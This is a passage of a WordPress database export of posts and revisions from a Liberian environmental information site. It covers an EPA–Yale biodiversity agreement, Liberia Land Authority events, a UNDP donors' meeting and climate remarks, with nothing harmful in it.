projects, while &nbsp;Yale will support the publication of research, communication, and national reporting materials that will be jointly developed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the agreement, Yale will financially support the development and maintenance of the geo-spatial observation system, training and software materials, and research publications while the EPA will provide staff support to collect species field observation data.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The parties will jointly solicit additional funds with existing and new partners to increase the project scope, longevity, and the establishment of new conservation areas informed by the observation system,” the MOU said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Each party may exchange information that promotes the best practices concerning policies and procedures, particularly those related to the quality assurance of joint activities, and designate a liaison officer to develop and coordinate the specific activities agreed upon.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Through these officers either party may initiate proposals for additional cooperative activities and work to identify the resources needed to carry out the activities described in the MOU,” the document said.</p>\n<!-- /wp:paragraph -->','EPA & Yale Enter Pact for Development of Species Observation System for Biodiversity','','publish','open','closed','','epa-yale-enter-pact-for-development-of-species-observation-system-for-biodiversity','','','2023-03-22 11:00:32','2023-03-22 11:00:32','',0,'https://ekmsliberia.info/?p=5298',84,'post','',0),(5299,42,'2023-03-22 10:59:54','2023-03-22 10:59:54','','ED','','inherit','open','closed','','ed-2','','','2023-03-22 10:59:54','2023-03-22 10:59:54','',5298,'https://ekmsliberia.info/wp-content/uploads/2023/03/ED.jpg',0,'attachment','image/jpeg',0),(5300,42,'2023-03-22 11:00:29','2023-03-22 11:00:29','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia and the Yale Center for Biodiversity and Global Change, Yale University have entered a three-year renewable pact for the development of a national species observation and planning system for biodiversity conservation in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Memorandum of Understanding (MOU) was signed on 12, February 2023, by Prof. Wilson K. Tarpeh, executive director of the EPA, and Dr. Alexander Killion, managing director of Yale Center for Biodiversity and Global Change for their respective institutions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the MOU, the EPA and Yale agreed to collaborate to develop a national species observation system and <img width=\"5\" height=\"2\" src=\"\">online geo-spatial dashboard for species-specific conservation planning at local, <img width=\"0\" height=\"0\" src=\"\">landscape, and national scales.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>They agreed to meet in person regularly, with the first meeting to take place at EPA headquarters at the earliest convenience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the MOU, Yale will develop a geo-spatial observation system to integrate species field observations with ‘Map of Life’ distribution models to improve conservation planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“In doing so, the parties will co-develop a national sampling protocol with existing EPA staff and partners in the field,” the MOU stated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It was also agreed that Yale Center for Biodiversity and Global Change develop a species-specific interactive map using these data to inform species conservation at the local landscape, and national scales.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This, according to the MOU will include reporting of species Habitat Index, Species Protection Index, and species Information Index.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This observation system will also prioritize where to implement future conservation efforts, including the establishment of new protected areas. Primary field data will not be shared with outside actors unless formally approved by the EPA,” The MOU indicated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Parties to the MOU also agreed that management meetings for planning and evaluation be done at least twice <img src=\"\" width=\"0\" height=\"0\">per year while parties will have larger team meetings quarterly to report on and improve project implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These meetings will include training for EPA staff to manage <img src=\"\" width=\"0\" height=\"0\">and use the observation system and the development of research projects, while &nbsp;Yale will support the publication of research, communication, and national reporting materials that will be jointly developed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the agreement, Yale will financially support the development and maintenance of the geo-spatial observation system, training and software materials, and research publications while the EPA will provide staff support to collect species field observation data.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The parties will jointly solicit additional funds with existing and new partners to increase the project scope, longevity, and the establishment of new conservation areas informed by the observation system,” the MOU said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Each party may exchange information that promotes the best practices concerning policies and procedures, particularly those related to the quality assurance of joint activities, and designate a liaison officer to develop and coordinate the specific activities agreed upon.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Through these officers either party may initiate proposals for additional cooperative activities and work to identify the resources needed to carry out the activities described in the MOU,” the document said.</p>\n<!-- /wp:paragraph -->','EPA & Yale Enter Pact for Development of Species Observation System for Biodiversity','','inherit','closed','closed','','5298-revision-v1','','','2023-03-22 11:00:29','2023-03-22 11:00:29','',5298,'https://ekmsliberia.info/?p=5300',0,'revision','',0),(5301,42,'2023-02-23 10:43:00','2023-02-23 10:43:00','<!-- wp:paragraph -->\n<p>Earlier today, the communications team from MGCSP participated in a planning meeting organized by Conservation International-Liberia. The meeting was hinged on developing Information, Education &amp; Communication materials relative to the Blue Oceans Programme thematic areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Blue Oceans programme promotes sustainable management of Liberia’s coastal and marine ecosystems. It works toward the conservation and restoration of marine and coastal ecosystem services to alleviate poverty, protect biodiversity, mitigate and adapt to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to UN Women, Gender inequality coupled with the climate crisis is one of the greatest challenges of our time. It poses threats to ways of life, livelihoods, health, safety and security for women and girls around the world.</p>\n<!-- /wp:paragraph -->','MGCSP\'s Communications Team Takes Part in a Planning Meeting Organized by Conservation International Liberia','','publish','open','closed','','mgcsps-communications-team-takes-part-in-a-planning-meeting-organized-by-conservation-international-liberia','','','2023-03-23 10:56:30','2023-03-23 10:56:30','',0,'https://ekmsliberia.info/?p=5301',83,'post','',0),(5302,42,'2023-03-23 10:49:19','2023-03-23 10:49:19','','mgcsp','','inherit','open','closed','','mgcsp','','','2023-03-23 10:49:19','2023-03-23 10:49:19','',5301,'https://ekmsliberia.info/wp-content/uploads/2023/03/mgcsp.jpg',0,'attachment','image/jpeg',0),(5303,42,'2023-03-23 10:56:26','2023-03-23 10:56:26','<!-- wp:paragraph -->\n<p>Earlier today, the communications team from MGCSP participated in a planning meeting organized by Conservation International-Liberia. The meeting was hinged on developing Information, Education &amp; Communication materials relative to the Blue Oceans Programme thematic areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Blue Oceans programme promotes sustainable management of Liberia’s coastal and marine ecosystems. It works toward the conservation and restoration of marine and coastal ecosystem services to alleviate poverty, protect biodiversity, mitigate and adapt to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to UN Women, Gender inequality coupled with the climate crisis is one of the greatest challenges of our time. It poses threats to ways of life, livelihoods, health, safety and security for women and girls around the world.</p>\n<!-- /wp:paragraph -->','MGCSP\'s Communications Team Takes Part in a Planning Meeting Organized by Conservation International Liberia','','inherit','closed','closed','','5301-revision-v1','','','2023-03-23 10:56:26','2023-03-23 10:56:26','',5301,'https://ekmsliberia.info/?p=5303',0,'revision','',0),(5304,42,'2023-03-04 10:57:00','2023-03-04 10:57:00','<!-- wp:paragraph -->\n<p>This year\'s theme was \"Partnerships for Wildlife Conservation\". Most speakers emphasized the shared responsibility in wildlife and Biodiversity conservation, calling on everyone - communities, government, civil society and international partners, to play their part in stopping trade in endangered species.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This year marks the 50th anniversary of the Convention on International Trade in Endangered Species CITES of wild plants and animals.</p>\n<!-- /wp:paragraph -->','The World Wildlife Day was Marked at the Liberia Forestry Training Institute Campus in Tubmanburg','','publish','open','closed','','the-world-wildlife-day-was-marked-at-the-liberia-forestry-training-institute-campus-in-tubmanburg','','','2023-03-23 11:07:42','2023-03-23 11:07:42','',0,'https://ekmsliberia.info/?p=5304',82,'post','',0),(5305,42,'2023-03-23 11:06:43','2023-03-23 11:06:43','','wilflife','','inherit','open','closed','','wilflife','','','2023-03-23 11:06:43','2023-03-23 11:06:43','',5304,'https://ekmsliberia.info/wp-content/uploads/2023/03/wilflife.jpg',0,'attachment','image/jpeg',0),(5306,42,'2023-03-23 11:07:39','2023-03-23 11:07:39','<!-- wp:paragraph -->\n<p>This year\'s theme was \"Partnerships for Wildlife Conservation\". Most speakers emphasized the shared responsibility in wildlife and Biodiversity conservation, calling on everyone - communities, government, civil society and international partners, to play their part in stopping trade in endangered species.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This year marks the 50th anniversary of the Convention on International Trade in Endangered Species CITES of wild plants and animals.</p>\n<!-- /wp:paragraph -->','The World Wildlife Day was Marked at the Liberia Forestry Training Institute Campus in Tubmanburg','','inherit','closed','closed','','5304-revision-v1','','','2023-03-23 11:07:39','2023-03-23 11:07:39','',5304,'https://ekmsliberia.info/?p=5306',0,'revision','',0),(5307,42,'2023-03-15 11:08:00','2023-03-15 11:08:00','<!-- wp:paragraph -->\n<p>The Liberia Land Authority (LLA) through the Land Use and Management <a></a>Department, with support from the Inclusive Land Administration and Management Project (ILAMP) implemented by Lantmateriet, Conducts a two-day regional training workshop in Kakata, Margibi County under the Theme: Capacity Building at The National, Regional and Local levels.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training title “Advancing Sustainable Urbanism and Rural Development through Land Use Planning and Management” brings together stakeholders from various sectors involved in urban and rural planning activities, City Mayors, Superintendents, Customary Land Development and Management Committees (CLDMCs), members of Civil Society organizations (CSOs) staff of the Liberia Land Authority County Land Offices (CLOs), and Land Use and Management Headquarters Staff.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop is intended to educate participants on the four (4) legal instruments that were developed by the LLA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These include: A) The National Land Use and Management Policy, B) Urban Zoning of land uses regulations, C) The Participatory Land Use Planning Guidelines, and D) The Framework for Rural Land Use regulations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The above-mentioned instruments will be used to regulate the location and uses of land, the nature and the extent of the uses of land by a comprehensive plan to promote the health, safety, sustainability, and general welfare of the cities and the rural communities within the Republic of Liberia. Additionally, the training will enhance participants’ knowledge of rural and urban land use management and planning activities in cities as well as rural communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the training workshop was the Superintendent of Margibi County, Hon. Jerry Varney.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Lastly, the LLA Commissioner for Land Use and Management Department, Hon. Ellen O. Pratt did the overview of the training follow by training presentations.</p>\n<!-- /wp:paragraph -->','LLA-LUMD Conducted two Days of Training in Kakata, Margibi County','','publish','open','closed','','lla-lumd-conducted-two-days-of-training-in-kakata-margibi-county','','','2023-03-23 11:16:20','2023-03-23 11:16:20','',0,'https://ekmsliberia.info/?p=5307',81,'post','',0),(5308,42,'2023-03-23 11:13:31','2023-03-23 11:13:31','','LLA','','inherit','open','closed','','lla-4','','','2023-03-23 11:13:31','2023-03-23 11:13:31','',5307,'https://ekmsliberia.info/wp-content/uploads/2023/03/LLA.jpg',0,'attachment','image/jpeg',0),(5309,42,'2023-03-23 11:16:16','2023-03-23 11:16:16','<!-- wp:paragraph -->\n<p>The Liberia Land Authority (LLA) through the Land Use and Management <a></a>Department, with support from the Inclusive Land Administration and Management Project (ILAMP) implemented by Lantmateriet, Conducts a two-day regional training workshop in Kakata, Margibi County under the Theme: Capacity Building at The National, Regional and Local levels.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training title “Advancing Sustainable Urbanism and Rural Development through Land Use Planning and Management” brings together stakeholders from various sectors involved in urban and rural planning activities, City Mayors, Superintendents, Customary Land Development and Management Committees (CLDMCs), members of Civil Society organizations (CSOs) staff of the Liberia Land Authority County Land Offices (CLOs), and Land Use and Management Headquarters Staff.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop is intended to educate participants on the four (4) legal instruments that were developed by the LLA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These include: A) The National Land Use and Management Policy, B) Urban Zoning of land uses regulations, C) The Participatory Land Use Planning Guidelines, and D) The Framework for Rural Land Use regulations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The above-mentioned instruments will be used to regulate the location and uses of land, the nature and the extent of the uses of land by a comprehensive plan to promote the health, safety, sustainability, and general welfare of the cities and the rural communities within the Republic of Liberia. Additionally, the training will enhance participants’ knowledge of rural and urban land use management and planning activities in cities as well as rural communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the training workshop was the Superintendent of Margibi County, Hon. Jerry Varney.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Lastly, the LLA Commissioner for Land Use and Management Department, Hon. Ellen O. Pratt did the overview of the training follow by training presentations.</p>\n<!-- /wp:paragraph -->','LLA-LUMD Conducted two Days of Training in Kakata, Margibi County','','inherit','closed','closed','','5307-revision-v1','','','2023-03-23 11:16:16','2023-03-23 11:16:16','',5307,'https://ekmsliberia.info/?p=5309',0,'revision','',0),(5310,42,'2023-03-14 11:16:00','2023-03-14 11:16:00','<!-- wp:paragraph -->\n<p>The Inclusive Green Growth Pillar of UNDP Liberia recently held a donors’ coordination meeting with the Ambassador and Representatives of Embassy of Sweden in Monrovia UK in Liberia - British Embassy, Monrovia and European Union in Liberia , to discuss prospects of the Community-Based Forestry and Protected Area Management Project in Liberia, focusing on community forests and protected areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The discussions centered on boosting biodiversity conservation and improving the livelihoods of Forest-Fringe/Forest-Dependent Communities and Groups in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Project is being implemented in 7 counties, in collaboration with Liberia’s Forestry Development Authority (FDA), and in line with a wide range of national forestry policies and implementation plans.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It also considers a national forest reform law in its implementation, by promoting the sustainable management, conservation, protection, and sustainable development of Liberia’s forests; and optimizing the benefits of the forestry sector, with a focus on the contribution of the sector to poverty alleviation in Liberia.</p>\n<!-- /wp:paragraph -->','The Inclusive Green Growth Pillar of UNDP Liberia Held a Donors’ Coordination Meeting','','publish','open','closed','','the-inclusive-green-growth-pillar-of-undp-liberia-held-a-donors-coordination-meeting','','','2023-03-23 11:20:00','2023-03-23 11:20:00','',0,'https://ekmsliberia.info/?p=5310',80,'post','',0),(5311,42,'2023-03-23 11:19:40','2023-03-23 11:19:40','','undp','','inherit','open','closed','','undp','','','2023-03-23 11:19:40','2023-03-23 11:19:40','',5310,'https://ekmsliberia.info/wp-content/uploads/2023/03/undp.jpg',0,'attachment','image/jpeg',0),(5312,42,'2023-03-23 11:19:57','2023-03-23 11:19:57','<!-- wp:paragraph -->\n<p>The Inclusive Green Growth Pillar of UNDP Liberia recently held a donors’ coordination meeting with the Ambassador and Representatives of Embassy of Sweden in Monrovia UK in Liberia - British Embassy, Monrovia and European Union in Liberia , to discuss prospects of the Community-Based Forestry and Protected Area Management Project in Liberia, focusing on community forests and protected areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The discussions centered on boosting biodiversity conservation and improving the livelihoods of Forest-Fringe/Forest-Dependent Communities and Groups in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Project is being implemented in 7 counties, in collaboration with Liberia’s Forestry Development Authority (FDA), and in line with a wide range of national forestry policies and implementation plans.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It also considers a national forest reform law in its implementation, by promoting the sustainable management, conservation, protection, and sustainable development of Liberia’s forests; and optimizing the benefits of the forestry sector, with a focus on the contribution of the sector to poverty alleviation in Liberia.</p>\n<!-- /wp:paragraph -->','The Inclusive Green Growth Pillar of UNDP Liberia Held a Donors’ Coordination Meeting','','inherit','closed','closed','','5310-revision-v1','','','2023-03-23 11:19:57','2023-03-23 11:19:57','',5310,'https://ekmsliberia.info/?p=5312',0,'revision','',0),(5314,42,'2023-03-24 09:27:00','2023-03-24 09:27:00','<!-- wp:paragraph -->\n<p>The Deputy Executive Director of the Environmental Protection Agency (EPA) of Liberia, Hon. Randall M. Dobayou, II has told a gathering in New York, United States of America that climate change is leading to more severe and frequent water-related disasters.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on Thursday, March 23, 2023, at an interactive dialogue on ‘Water for Climate Resilience, Environment, and Biodiversity at the ongoing United Nations Conference in New York, Hon. Dobayou said climate change also worsens environmental degradation, including pollution, increased water temperatures, ecosystem loss, economies, societies, and the environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the water resource potential of Liberia is encouraging, but said that the West African country lacks adequate, and proper management in the context of access to resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is one of the world’s wettest countries but lacks vital networks to reach everyone with clean drinking water,” the EPA Deputy Executive Director said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the President of Liberia His Excellency Dr. George M. Weah has constantly advocated for a program to distribute quality and safe drinking water to all Liberians.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further told the gathering that over the last few years, the Government of Liberia focused on upgrading the country’s WASH infrastructure and service provision.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We want to keep providing universal sustainable and equitable access to safe drinking water. Unfortunately, the EPA as the National Designated Authority (NDA) has struggled to secure finance from the Green Climate Funds to make a significant intervention in the Wash sector because of many bureaucratic challenges,” Deputy Director Dobayou said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said, “We are therefore asking for a substantial reduction in the bureaucracy to allow developing countries such as Liberia access resources as we work to increase our strategic urban and rural water supply by 100 % under our SDG target by 2030”.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He reminds participants at the dialogues that an increase in global warming is projected to exacerbate risks to ecosystems and humans; studies show that nine out of ten disasters triggered by natural hazards during the last decade were water-related.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Due to their water-dependent nature, food security, human health, urban and rural settlements, energy production, industrial development, economic development, and ecosystems are increasingly vulnerable to the impacts of climate change,” Dobayou added.</p>\n<!-- /wp:paragraph -->','Liberia: EPA Attributes Frequent Water-Related Disasters To Climate Change','','publish','open','closed','','liberia-epa-attributes-frequent-water-related-disasters-to-climate-change','','','2023-03-29 10:13:21','2023-03-29 10:13:21','',0,'https://ekmsliberia.info/?p=5314',79,'post','',0),(5315,42,'2023-03-29 10:12:10','2023-03-29 10:12:10','','DED','','inherit','open','closed','','ded-6','','','2023-03-29 10:12:10','2023-03-29 10:12:10','',5314,'https://ekmsliberia.info/wp-content/uploads/2023/03/DED.jpg',0,'attachment','image/jpeg',0),(5316,42,'2023-03-29 10:13:09','2023-03-29 10:13:09','<!-- wp:paragraph -->\n<p>The Deputy Executive Director of the Environmental Protection Agency (EPA) of Liberia, Hon. Randall M. Dobayou, II has told a gathering in New York, United States of America that climate change is leading to more severe and frequent water-related disasters.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on Thursday, March 23, 2023, at an interactive dialogue on ‘Water for Climate Resilience, Environment, and Biodiversity at the ongoing United Nations Conference in New York, Hon. Dobayou said climate change also worsens environmental degradation, including pollution, increased water temperatures, ecosystem loss, economies, societies, and the environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the water resource potential of Liberia is encouraging, but said that the West African country lacks adequate, and proper management in the context of access to resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is one of the world’s wettest countries but lacks vital networks to reach everyone with clean drinking water,” the EPA Deputy Executive Director said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the President of Liberia His Excellency Dr. George M. Weah has constantly advocated for a program to distribute quality and safe drinking water to all Liberians.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further told the gathering that over the last few years, the Government of Liberia focused on upgrading the country’s WASH infrastructure and service provision.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We want to keep providing universal sustainable and equitable access to safe drinking water. Unfortunately, the EPA as the National Designated Authority (NDA) has struggled to secure finance from the Green Climate Funds to make a significant intervention in the Wash sector because of many bureaucratic challenges,” Deputy Director Dobayou said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said, “We are therefore asking for a substantial reduction in the bureaucracy to allow developing countries such as Liberia access resources as we work to increase our strategic urban and rural water supply by 100 % under our SDG target by 2030”.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He reminds participants at the dialogues that an increase in global warming is projected to exacerbate risks to ecosystems and humans; studies show that nine out of ten disasters triggered by natural hazards during the last decade were water-related.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Due to their water-dependent nature, food security, human health, urban and rural settlements, energy production, industrial development, economic development, and ecosystems are increasingly vulnerable to the impacts of climate change,” Dobayou added.</p>\n<!-- /wp:paragraph -->','Liberia: EPA Attributes Frequent Water-Related Disasters To Climate Change','','inherit','closed','closed','','5314-revision-v1','','','2023-03-29 10:13:09','2023-03-29 10:13:09','',5314,'https://ekmsliberia.info/?p=5316',0,'revision','',0),(5317,42,'2023-03-24 10:29:00','2023-03-24 10:29:00','<!-- wp:paragraph -->\n<p>The Liberia Land Authority (LLA) with support from the Swedish Government through the Inclusive Land Administration and Management Project (ILAMP) being implemented by Lantmätariet of Sweden, will on Thursday, March 23rd, 2023 officially launch its County Land Office (CLOs) in Gbarnga City, Bong County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Liberia Land Authority (LLA) was established by an Act of the Legislature in October 2016, thus <a></a>consolidating all land related functions previously performed by key land administration agencies, such as the Department of Lands, Survey and Cartography (DLSC) under the former Ministry of Lands, Mines and Energy, and the Deed and Title Registry of the Center for National Document Record Agency (CNDRA).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Section 45.1 and Section 6.2 of the LLA Act mandates the LLA to administer the affairs of the Authorities and establish County Land Offices (CLOs) necessary for the proper conduct of business across the fifteen subdivision of the Republic of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, in fulfilment of the Government of Liberia (GoL) decentralization policy (taking efficient and effective service delivery to the people), the LLA received support from the just ended World Bank supported Liberia Land Administration Project (LLAP) to renovate five (5) offices in Bomi, Grand Bassa, Grand Gedeh, Bong and Lofa Counties, respectively. The renovation of the five offices is to help strengthen the services of the LLA in the five selected counties in other to meet the public quest to obtain good land service and delivery.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Further, at the end of the renovation of the five county land offices, the Government of Sweden through the Inclusive Land Administration and Management Project (ILAMP) which is being implemented by Lantmätariet, the Swedish Mapping, Cadastral and Land Registration Authority, has provided support for the electrification, furnishing, equipping and training of LLA staff within the five selected counties to provide efficient and effective land service delivery to the public.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The one-day event which is expected to commence Thursday, March 23rd, 2023, brings together members of foreign diplomatic missions to Liberia, delegation from the World Bank and UNDP, donors and partners, heads of government ministries and agencies, members of the Bong County Legislative Caucus, Senators, local county authorities, representatives of CSOs working in Bong County, representatives from Lantmätariet and ILAMP, traditional leaders, women and youth groups in Bong County, amongst others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The delegation of the LLA which is comprised of members of the Board of Commissioners, Executive Director, Senior Management and technical staff is being headed by the LLA Chairman, Hon. Atty. J. Adams Manobah, Sr.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The objectives are: 1) To mark the official opening of one of the five newly renovated and furnished County Land Office in Gbarnga, Bong County and, 2) To demonstrate the government’s commitment toward decentralizing land services throughout the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>FOR ALL YOUR LAND MATTERS, REACH OUT TO ANY OF THE LIBERIA LAND AUTHORITY (LLA) OFFICES ACROSS THE FIFTEEN COUNTIES OF LIBERIA.</p>\n<!-- /wp:paragraph -->','LLA To Launch Renovated County Land Office in Gbarnga, Bong County','','publish','open','closed','','lla-to-launch-renovated-county-land-office-in-gbarnga-bong-county','','','2023-03-29 10:43:02','2023-03-29 10:43:02','',0,'https://ekmsliberia.info/?p=5317',78,'post','',0),(5318,42,'2023-03-29 10:42:47','2023-03-29 10:42:47','','lla','','inherit','open','closed','','lla-5','','','2023-03-29 10:42:47','2023-03-29 10:42:47','',5317,'https://ekmsliberia.info/wp-content/uploads/2023/03/lla-1.jpg',0,'attachment','image/jpeg',0),(5319,42,'2023-03-29 10:42:59','2023-03-29 10:42:59','<!-- wp:paragraph -->\n<p>The Liberia Land Authority (LLA) with support from the Swedish Government through the Inclusive Land Administration and Management Project (ILAMP) being implemented by Lantmätariet of Sweden, will on Thursday, March 23rd, 2023 officially launch its County Land Office (CLOs) in Gbarnga City, Bong County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Liberia Land Authority (LLA) was established by an Act of the Legislature in October 2016, thus <a></a>consolidating all land related functions previously performed by key land administration agencies, such as the Department of Lands, Survey and Cartography (DLSC) under the former Ministry of Lands, Mines and Energy, and the Deed and Title Registry of the Center for National Document Record Agency (CNDRA).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Section 45.1 and Section 6.2 of the LLA Act mandates the LLA to administer the affairs of the Authorities and establish County Land Offices (CLOs) necessary for the proper conduct of business across the fifteen subdivision of the Republic of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, in fulfilment of the Government of Liberia (GoL) decentralization policy (taking efficient and effective service delivery to the people), the LLA received support from the just ended World Bank supported Liberia Land Administration Project (LLAP) to renovate five (5) offices in Bomi, Grand Bassa, Grand Gedeh, Bong and Lofa Counties, respectively. The renovation of the five offices is to help strengthen the services of the LLA in the five selected counties in other to meet the public quest to obtain good land service and delivery.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Further, at the end of the renovation of the five county land offices, the Government of Sweden through the Inclusive Land Administration and Management Project (ILAMP) which is being implemented by Lantmätariet, the Swedish Mapping, Cadastral and Land Registration Authority, has provided support for the electrification, furnishing, equipping and training of LLA staff within the five selected counties to provide efficient and effective land service delivery to the public.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The one-day event which is expected to commence Thursday, March 23rd, 2023, brings together members of foreign diplomatic missions to Liberia, delegation from the World Bank and UNDP, donors and partners, heads of government ministries and agencies, members of the Bong County Legislative Caucus, Senators, local county authorities, representatives of CSOs working in Bong County, representatives from Lantmätariet and ILAMP, traditional leaders, women and youth groups in Bong County, amongst others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The delegation of the LLA which is comprised of members of the Board of Commissioners, Executive Director, Senior Management and technical staff is being headed by the LLA Chairman, Hon. Atty. J. Adams Manobah, Sr.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The objectives are: 1) To mark the official opening of one of the five newly renovated and furnished County Land Office in Gbarnga, Bong County and, 2) To demonstrate the government’s commitment toward decentralizing land services throughout the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>FOR ALL YOUR LAND MATTERS, REACH OUT TO ANY OF THE LIBERIA LAND AUTHORITY (LLA) OFFICES ACROSS THE FIFTEEN COUNTIES OF LIBERIA.</p>\n<!-- /wp:paragraph -->','LLA To Launch Renovated County Land Office in Gbarnga, Bong County','','inherit','closed','closed','','5317-revision-v1','','','2023-03-29 10:42:59','2023-03-29 10:42:59','',5317,'https://ekmsliberia.info/?p=5319',0,'revision','',0),(5320,42,'2023-02-09 10:50:00','2023-02-09 10:50:00','<!-- wp:paragraph -->\n<p>More than 40 Ministers of Agriculture from the African Continent were in attendance, but Liberia’s Agriculture Minister, Jeanine M. Cooper, was among the only five African Ministers of Agriculture who addressed the three-day Feed Africa Summit in Dakar, the Republic of Senegal in late January.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Akinwumi A. Adesina, President of the African Development Bank Group invited Minister Cooper to make Liberia’s <a></a>case at the Summit where 20 Heads of State including the President of Northern Ireland attended.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Summit was themed: “Food Sovereignty and Resilience” under the aegis of the African Development Bank and Government of the Republic of Senegal.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It was the biggest gathering of African Ministers of Agriculture and Finance along with continental stakeholders in food and agriculture interlinking with scores of global actors.</p>\n<!-- /wp:paragraph -->','Minister of Agriculture, Jeanine M. Cooper, Addresses the Three-Day Feed Africa Summit in Dakar, 